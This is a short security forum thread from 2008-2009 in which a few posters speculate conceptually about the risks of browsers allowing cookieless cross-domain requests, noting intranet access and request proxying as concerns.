Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Risks of cross-domain without cookies
Posted by: riahmatic
Date: November 15, 2008 10:50AM

Let's say browsers didn't send any cookies when embedding content (img, script, css, video) across domains and allowed cross-domain requests on anything. so your client-side code would have the same reach as server-side code and the same restrictions, having no session cookies. What are the flaws with this model - any new risks? I couldn't come up with anything good.

Options: ReplyQuote
Re: Risks of cross-domain without cookies
Posted by: DoctorDan
Date: November 22, 2008 01:52AM

I can't think of anything off of the top of my head. I mean, that makes it 100% stateless, right? I'm interested to hear some thoughts on this, actually.

-Dan

Options: ReplyQuote
Re: Risks of cross-domain without cookies
Posted by: Gorka
Date: November 22, 2008 08:12PM

Well, if you actually had the same reach as server side what could stop you from injecting server side code to gain acces to everything?

Cheers

Options: ReplyQuote
Re: Risks of cross-domain without cookies
Posted by: riahmatic
Date: November 25, 2008 01:35PM

Okay, I have something. The clientside code would still have access to local intranet resources, where as the server side code wouldn't - so the reach actually isn't the same. Even though they are both stateless the clientside code can load anything off the intranet unless it's locked down. Any unsecured files and forms could be requested. So not sending cookies doesn't seem to be enough protection here...

Options: ReplyQuote
Re: Risks of cross-domain without cookies
Posted by: ademix
Date: August 04, 2009 02:52PM

You can also use it to proxy your requests

Options: ReplyQuote


Sorry, only registered users may post in this forum.